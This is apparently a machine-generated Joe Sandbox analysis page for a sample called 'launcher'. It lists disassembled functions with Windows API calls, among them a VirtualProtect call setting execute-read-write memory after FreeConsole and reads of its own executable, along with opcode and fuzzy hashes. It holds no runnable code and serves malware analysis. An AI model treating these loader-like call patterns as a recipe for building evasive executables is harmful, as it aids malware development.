Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b09722554e27dca859cb9522539c24c351078d73e4adfe8b48222c9131359e57
Instruction ID: 9ee5c572104ed8e7fc90407be2da807402fe4debdb8da7cd53d204c8d7c1f51d
Opcode Fuzzy Hash: b09722554e27dca859cb9522539c24c351078d73e4adfe8b48222c9131359e57
Instruction Fuzzy Hash: 5021EB31B03711ABC7219B65DC80A6A7FE9DB51B60F1501A1F905A72D0EB78EF0CD6D0

Function 00B31750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00B31783

Strings

ios_base::eofbit set, xrefs: 00B31BEA
ios_base::badbit set, xrefs: 00B31BFA, 00B31C20
ios_base::failbit set, xrefs: 00B31BEF

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: 5871c9d22b308eef8a0abf6eaff85a9cfa17234a7d4860c893c56f7d2db66cd7
Instruction ID: dfafcf94d474d9d1f7e0aa0ab8b89590a959fdf2013fb42a82e227d5e7f7d2bc
Opcode Fuzzy Hash: 5871c9d22b308eef8a0abf6eaff85a9cfa17234a7d4860c893c56f7d2db66cd7
Instruction Fuzzy Hash: 06F18F75A016148FCB14CF6CC494BADB7F5FF88320F2986A9E815AB391D774AD05CB90

Function 00B45349 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00B45392
GetLastError.KERNEL32(?,?,?,00B32513,00000000,00000000), ref: 00B4539E
__dosmaperr.LIBCMT ref: 00B453A5

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: fc8031655c599673ccfbcd9276b3a052a05d5b0281d898be559d69e7b5e8656f
Instruction ID: 602ec675756c9db4c8996b7c96d82193934fbdc50ac4caf50b6e1d0562ff41f4
Opcode Fuzzy Hash: fc8031655c599673ccfbcd9276b3a052a05d5b0281d898be559d69e7b5e8656f
Instruction Fuzzy Hash: 7C014C72505A19ABDF259FA4DC06AAE3BE9FF00395F104098F80296191EBB0DF50EB94

Function 00B454EE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B4C2BB: GetLastError.KERNEL32(00000000,?,00B476E9,00B4D306,?,?,00B4C1B7,00000001,00000364,?,00000006,000000FF,?,00B45495,00B68E38,0000000C), ref: 00B4C2BF
Part of subcall function 00B4C2BB: SetLastError.KERNEL32(00000000), ref: 00B4C361

CloseHandle.KERNEL32(?,?,?,00B453D9,?,?,00B454CE,00000000), ref: 00B4551F
FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00B453D9,?,?,00B454CE,00000000), ref: 00B45535
ExitThread.KERNEL32 ref: 00B4553E

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: fd9febb27568eca6b3a73d5a781b97e2d6c537850a71afb8c031740ea3997a63
Instruction ID: e68d908ae46a0093586c5e007c622ecaba0a084c437dda859501c67cd1ddc708
Opcode Fuzzy Hash: fd9febb27568eca6b3a73d5a781b97e2d6c537850a71afb8c031740ea3997a63
Instruction Fuzzy Hash: 7CF05E71500E046BCB355B759808B3A3BDAEF10370B084694F869C70E2DF64EF42A791

Function 00B4565F Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,00B45721,00B48396,00B48396,?,00000002,DA36A356,00B48396,00000002), ref: 00B45670
TerminateProcess.KERNEL32(00000000,?,00B45721,00B48396,00B48396,?,00000002,DA36A356,00B48396,00000002), ref: 00B45677
ExitProcess.KERNEL32 ref: 00B45689

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9e8cdc21e9be9d14b852d54030a0295d8422b4cc6f6be9de764ab1278926a37d
Instruction ID: b04a0f71e95054ae5d558fe9494e20da677dd2d784ffda3c9a554f04e243a87e
Opcode Fuzzy Hash: 9e8cdc21e9be9d14b852d54030a0295d8422b4cc6f6be9de764ab1278926a37d
Instruction Fuzzy Hash: D9D09231000E08BBCF212F61DD0D9993F6AEF50381B454064F9498A0B7DFBA9A92EB84

Function 00B53BF4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B53F9E: GetConsoleOutputCP.KERNEL32(DA36A356,00000000,00000000,?), ref: 00B54001

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00B48584,?), ref: 00B53D79
GetLastError.KERNEL32(?,?,00B48584,?,00B487C8,00000000,?,00000000,00B487C8,?,?,?,00B68FE8,0000002C,00B486B4,?), ref: 00B53D83

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: fe3e4033439f5eb1e1dcb6b50f9ee4491f11a35e4531f0b74d1a8f3592532d79
Instruction ID: d2e3a0fb03af18a41648d623a0d36a5e1a23158b224b42ae582612048a4da281
Opcode Fuzzy Hash: fe3e4033439f5eb1e1dcb6b50f9ee4491f11a35e4531f0b74d1a8f3592532d79
Instruction Fuzzy Hash: 8C61BF71900219AFDF11CFA8C885BAEBBF9EB09745F1401D9EC00A7352D772DA09CBA0

Function 00B543CD Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00B53D5F,00000000,00B487C8,?,00000000,?,00000000), ref: 00B54469
GetLastError.KERNEL32(?,00B53D5F,00000000,00B487C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00B48584), ref: 00B5448F

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 8b4976fb2c34db1b4522b4c095756ec355b38a95af82020a4d473c12bd0c946c
Instruction ID: c693534d449e0454f80628c089311b92d259a696e14f82d48b5f0e7e793c6af9
Opcode Fuzzy Hash: 8b4976fb2c34db1b4522b4c095756ec355b38a95af82020a4d473c12bd0c946c
Instruction Fuzzy Hash: 19218235A002199BCB19CF19DC80BE9B7F9EB48306F1444E9E905D7351DB309D86CF60

Function 00B390F0 Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00B391C9
std::_Throw_Cpp_error.LIBCPMT ref: 00B391D7

Part of subcall function 00B3EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00B38E4A,00B3A2F0), ref: 00B3EFE7

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID:
API String ID: 3666349979-0
Opcode ID: ac1ea162b81abf76965fd766f9adecbab8f1952c985bd11ead44f99881d68ddf
Instruction ID: 7935a58e7ca48ee31ed4db533c4e639453d616c120218940fd35380fb8395326
Opcode Fuzzy Hash: ac1ea162b81abf76965fd766f9adecbab8f1952c985bd11ead44f99881d68ddf
Instruction Fuzzy Hash: B121F1B1A00A56ABDB10AF648D45BAEBBF4FB04320F244269E525673C1D7B4A904CBD2

Function 00B4DA52 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B4D941,00B69330,0000000C), ref: 00B4DA9E
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B4D941,00B69330,0000000C), ref: 00B4DAB0

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 76578b6a4b4ab4efb86b0044278bfb64874a97f46c9a97ea6b5b379a972dd82b
Instruction ID: fb991ec5a6dc7d51e98b351878cdf88269b17d4cde520726db60966a73a14dee
Opcode Fuzzy Hash: 76578b6a4b4ab4efb86b0044278bfb64874a97f46c9a97ea6b5b379a972dd82b
Instruction Fuzzy Hash: CB115471508B524AC7308A3E8CC86227AE5EB56330B3807DED6B6875F1C6B4DA86E641

Function 00B31EF0 Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B31240: _strlen.LIBCMT ref: 00B312BA

FreeConsole.KERNELBASE(?,?,?,?,?,00B3173F,?,?,?,00000000,?), ref: 00B31F21
VirtualProtect.KERNELBASE(00B6A011,00000549,00000040,?), ref: 00B31F78

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ConsoleFreeProtectVirtual_strlen
String ID:
API String ID: 1248733679-0
Opcode ID: 61e806b3183104fe59f22058b36a4a7724c05a18601af5228b34bdae7f3029d9
Instruction ID: 77a3738c577036b7a9bf0ca1a3f785afc638a9c6a09e0d5ea08b379fb24c0f16
Opcode Fuzzy Hash: 61e806b3183104fe59f22058b36a4a7724c05a18601af5228b34bdae7f3029d9
Instruction Fuzzy Hash: C511C671A401047BDB04BBA8DC03EBF7BF8EB44701F5448A9F904B72D2EAB959504BD5

Function 00B45470 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00B68E38,0000000C), ref: 00B45483
ExitThread.KERNEL32 ref: 00B4548A

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 8ce7b8ee0c823c93fa2213497d1dd0529624da73ed528827667efb58f4aed8c7
Instruction ID: e4718416633c7ab3246ec8b5b55e8bf301845fedb449d15a1372155baf99f73a
Opcode Fuzzy Hash: 8ce7b8ee0c823c93fa2213497d1dd0529624da73ed528827667efb58f4aed8c7
Instruction Fuzzy Hash: FBF0C871A01A05AFDB14AFB0C80AA6E3BB0FF04B10F1041D9F4019B292CF785E41EB91

Function 00B32270 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00B32288
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B3229C

Part of subcall function 00B31FB0: CreateFileA.KERNELBASE ref: 00B32036
Part of subcall function 00B31FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00B32046
Part of subcall function 00B31FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00B3206B
Part of subcall function 00B31FB0: CloseHandle.KERNELBASE(00000000), ref: 00B3207A
Part of subcall function 00B31FB0: _strlen.LIBCMT ref: 00B320CD

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: File$HandleModule$CloseCreateNameReadSize_strlen
String ID:
API String ID: 3505371420-0
Opcode ID: 37e4fdc873d79783bc66de84ea73a734c632ebee510efdc8d20736f32e5b7ba1
Instruction ID: a7dd3c174ac45de8e4c75c948d22b8fa9aff7964ada760bf28e2151e9f00b924
Opcode Fuzzy Hash: 37e4fdc873d79783bc66de84ea73a734c632ebee510efdc8d20736f32e5b7ba1
Instruction Fuzzy Hash: 0BF0E5B190121027D1216724AC4BEAB7BBCDF95710F004914F5894B1C1EEB81545C693

Function 00B4BED7 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00B502B4,?,00000000,?,?,00B4FF54,?,00000007,?,?,00B5089A,?,?), ref: 00B4BEED
GetLastError.KERNEL32(?,?,00B502B4,?,00000000,?,?,00B4FF54,?,00000007,?,?,00B5089A,?,?), ref: 00B4BEF8

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 3b1531d8a09f66b1cef4d5b1967912b5da32a872487c24592641e95864d8c747
Instruction ID: 92aef6190922ff8ef2f43202fb8751b6724a2c9c5f16e50c0c813110e36be206
Opcode Fuzzy Hash: 3b1531d8a09f66b1cef4d5b1967912b5da32a872487c24592641e95864d8c747
Instruction Fuzzy Hash: 9CE08C32604614ABCF112FA4AC08B993BA8EB00391F1080A1F608972B0CF78CE40DBD4

Function 00B3DEF0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db62f4c3ce0e3952b4fdaeb7fda0048b5ad033c623a45b386ddb3edc8956a9a3
Instruction ID: edb61beb68abc655770140992820cbc4fbed440f9ea3df16ee4513ebdee7ce2b
Opcode Fuzzy Hash: db62f4c3ce0e3952b4fdaeb7fda0048b5ad033c623a45b386ddb3edc8956a9a3
Instruction Fuzzy Hash: 15416B31A0011AAFCB18DF68D8949EDB7F9FF18314F6400AAE442E7680EA31FD45DB90

Function 00B3CB40 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb22435c7be6fd7edf8be2725d1c6630ae571793fb89b20c0d77bb3de29b3b07
Instruction ID: f7d671b06115cd5f04995ab8231522d326520e9be0f25f1cd9a17e960b7b7088
Opcode Fuzzy Hash: cb22435c7be6fd7edf8be2725d1c6630ae571793fb89b20c0d77bb3de29b3b07
Instruction Fuzzy Hash: 8F31667290411AAFCB14DEA8D9909DDBBF8FF09320F6412A6E515F3690E731F954CB90

Function 00B3B060 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00B3AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00B38A2A,?,?,00B3AF87,00B38A2A,?,00B3AF58,00B38A2A,?,?,?), ref: 00B3AFD0

FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,DA36A356,?,?,?,Function_0002BE94,000000FF), ref: 00B3B0C7

Part of subcall function 00B3AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 00B3AF1B

Part of subcall function 00B3EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00B38E4A,00B3A2F0), ref: 00B3EFE7

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
String ID:
API String ID: 3627539351-0
Opcode ID: 882f225f9de822096a4697d8d83805d07fc74c7a92ef5a35b518c48e77dd1c3c
Instruction ID: c6eef49ad0f0ded433ea061104c002f4d2b155f2c1e04c049f8eba5113e23d7c
Opcode Fuzzy Hash: 882f225f9de822096a4697d8d83805d07fc74c7a92ef5a35b518c48e77dd1c3c
Instruction Fuzzy Hash: 8811C432604A509BCB256B25DC15E3EBBE5EB41B20F30449BF952D76D1CF79DC00CA91

Function 00B4CFD6 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

